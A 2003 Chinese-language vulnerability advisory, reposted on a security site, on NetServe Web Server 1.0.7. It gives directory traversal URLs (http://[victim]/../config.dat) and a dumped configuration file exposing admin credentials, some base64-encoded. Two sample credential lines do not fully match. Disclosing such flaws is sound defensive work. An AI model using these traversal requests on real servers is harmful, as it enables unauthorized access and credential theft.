首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>本站原创>windows原创>文章内容
netserve安全缺陷
来源:www.vfocus.net 作者:vitter 发布时间:2003-11-20  
翻译整理 by vitter@safechina.net

 

应用程序 : NetServe Web Server
日期 : 17.11.2003
版本 : 1.0.7 (或更低版本)
平台 : Windows NT, 95, 98, 2000, and XP.
严重性 : 高
本地 : 是
远程 : 是
测试环境 : WinXP and Win2K.
描述:netserve新增安全缺陷
详细:
netserve是一款提高web服务和文件共享的应用程序,运行于Windows NT, 95, 98, 2000, and XP系列平台上。该缺陷允许远程攻击者查看任意目录,查看服务器配置文件,能获得netserve管理员密码。
1)目录遍历:
NetServe server没有正确的过滤提交的请求中所包含的“/../../”特殊字符,能允许攻击者查看HTML根目录下的所有文件。
攻击方法:
http://[victim]/../test/
允许查看文件夹- /test/
http://[victim]/../test/test.txt
运行查看 /test/文件夹下的文件
2)netserve配置文件默认放在wwwroot目录下,通过向目标主机发送进行构造的URL地址能获得配置文件。配置文件代码中包含如下代码:
Users username|password|...
攻击方法:
http://[victim]/../config.dat
Example of a file:
================
EnableCGI True
EnableRemoteAdmin True
EnableSSI False
EnablePasswords True
IndexFiles index.html index.htm
SSIAbbrevSize True
SSIExtensions shtml
SSIErrorMessage An SSI Error Has Occured
SSITimeFormat
AuthenticationType Basic
Port 80
ServerRoot D:\Program Files\NetServe Web Server\wwwroot\
Logging True
Counter False
Minimized True
ActivateOnStart False
MimeTypes application/mac-binhex40|hqx
MimeTypes application/msword|doc
MimeTypes application/octet-stream|bin dms lha lzh exe class
MimeTypes application/pdf|pdf
MimeTypes application/postscript|ai eps ps
MimeTypes application/smil|smi smil
MimeTypes application/vnd.mif|mif
MimeTypes application/vnd.ms-asf|asf
MimeTypes application/vnd.ms-excel|xls
MimeTypes application/vnd.ms-powerpoint|ppt
MimeTypes application/x-cdlink|vcd
MimeTypes application/x-compress|Z
MimeTypes application/x-cpio|cpio
MimeTypes application/x-csh|csh
MimeTypes application/x-director|dcr dir dxr
MimeTypes application/x-dvi|dvi
MimeTypes application/x-gtar|gtar
MimeTypes application/x-gzip|gz
MimeTypes application/x-javascript|js
MimeTypes application/x-latex|latex
MimeTypes application/x-sh|sh
MimeTypes application/x-shar|shar
MimeTypes application/x-shockwave-flash|swf
MimeTypes application/x-stuffit|sit
MimeTypes application/x-tar|tar
MimeTypes application/x-tcl|tcl
MimeTypes application/x-tex|tex
MimeTypes application/x-texinfo|texinfo texi
MimeTypes application/x-troff|t tr roff
MimeTypes application/x-troff-man|man
MimeTypes application/x-troff-me|me
MimeTypes application/x-troff-ms|ms
MimeTypes application/zip|zip
MimeTypes audio/basic|au snd
MimeTypes audio/midi|mid midi kar
MimeTypes audio/mpeg|mpga mp2 mp3
MimeTypes audio/x-aiff|aif aiff aifc
MimeTypes audio/x-pn-realaudio|ram rm
MimeTypes audio/x-realaudio|ra
MimeTypes audio/x-wav|wav
MimeTypes image/bmp|bmp
MimeTypes image/gif|gif
MimeTypes image/ief|ief
MimeTypes image/jpeg|jpeg jpg jpe
MimeTypes image/png|png
MimeTypes image/tiff|tiff tif
MimeTypes image/x-cmu-raster|ras
MimeTypes image/x-portable-anymap|pnm
MimeTypes image/x-portable-bitmap|pbm
MimeTypes image/x-portable-graymap|pgm
MimeTypes image/x-portable-pixmap|ppm
MimeTypes image/x-rgb|rgb
MimeTypes image/x-xbitmap|xbm
MimeTypes image/x-xpixmap|xpm
MimeTypes image/x-xwindowdump|xwd
MimeTypes image/x-icon|ico
MimeTypes model/iges|igs iges
MimeTypes model/mesh|msh mesh silo
MimeTypes model/vrml|wrl vrml
MimeTypes text/css|css
MimeTypes text/html|html htm
MimeTypes text/plain|asc txt
MimeTypes text/richtext|rtx
MimeTypes text/rtf|rtf
MimeTypes text/sgml|sgml sgm
MimeTypes text/tab-separated-values|tsv
MimeTypes text/xml|xml
MimeTypes video/mpeg|mpeg mpg mpe
MimeTypes video/quicktime|qt mov
MimeTypes video/x-msvideo|avi
Users nimber|password||bmltYmWyfnZpFXmuYW0=
Aliases /admin|D:\Program Files\NetServe Web Server\admin
================
3)利用上述方法,我们能获得netserve管理员远程管理密码。他允许我们完全改变服务器配置!
====[config.dat]====
Users nimber|vietnam||bmltYmVyOnZpZXRuYW0=
Aliases /admin|D:\Program Files\NetServe Web Server\admin
====[config.dat]====
解决方案:
目前厂商未公布该缺陷补丁,请用户及时关注厂商站点:
http://www.starlots.com/netx/index.html


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·突破网关限制上qq
·windows下用openssh、ant、vss控
·控制台下修改系统驱动状态的程序
·Win平台上如何写ShellCode
·用AdminScripts下的vbs工具在80
·IPSec Filer
·安装windows2000
  相关文章
·控制台下修改系统驱动状态的程序
·用AdminScripts下的vbs工具在80
·IPSec Filer
·Win平台上如何写ShellCode
·突破网关限制上qq
·安装windows2000
·windows下用openssh、ant、vss控
  推荐广告
CopyRight © 2002-2018 VFocuS.Net All Rights Reserved